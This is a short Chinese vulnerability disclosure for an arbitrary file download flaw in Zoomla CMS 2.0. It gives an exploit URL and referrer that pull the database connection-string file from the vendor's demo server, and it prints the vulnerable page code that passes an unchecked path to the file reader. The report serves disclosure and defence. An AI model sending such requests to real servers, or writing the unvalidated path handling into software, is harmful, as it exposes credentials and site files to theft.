### 简要描述:
目前试了最新的逐浪CMS2 x2.0可以,然后官网的DEMO也可以
### 详细说明:
Config/ConnectionStrings.config为数据库连接文件,当然,整站都可以下载,只要换下就得了
```
http://demo.zoomla.cn/user/iServer/FiServerInfo.aspx?menu=filedown&filepath=//Config//ConnectionStrings.config
```
referrer:
```
http://demo.zoomla.cn/user/iServer/FiServer.aspx
```
[<img src="https://images.seebug.org/upload/201408/0415222836808150d9ff4239e8aeccda57069917.png" alt="zoomla.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/0415222836808150d9ff4239e8aeccda57069917.png)
### 漏洞证明:
FiServerInfo.aspx对应的page_load函数,未经验证范围,导致全站可下载
```
protected void Page_Load(object sender, EventArgs e)
{
if (!string.IsNullOrEmpty(base.Request.QueryString["menu"]) && (base.Request.QueryString["menu"] == "filedown"))
{
string path = base.Request.QueryString["filepath"];
if (path != "")
{
FileInfo info = new FileInfo(base.Server.MapPath(path));
if (info.Exists)
{
base.Response.Clear();
base.Response.AddHeader("Content-Disposition", "attachment; filename=" + base.Server.UrlEncode(info.Name));
base.Response.AddHeader("Content-Length", info.Length.ToString());
base.Response.ContentType = "application/octet-stream";
base.Response.Filter.Close();
base.Response.WriteFile(info.FullName);
base.Response.End();
}
else
{
base.Response.Write("<script>alert('该文件不存在!');history.go(-1);</script>");
}
}
}
if (!base.IsPostBack)
{
int questionId = DataConverter.CLng(base.Request.QueryString["QuestionId"]);
this.MyBind(questionId);
this.spfiletype.InnerHtml = SiteConfig.SiteOption.UploadFileExts;
}
}
```
暂无评论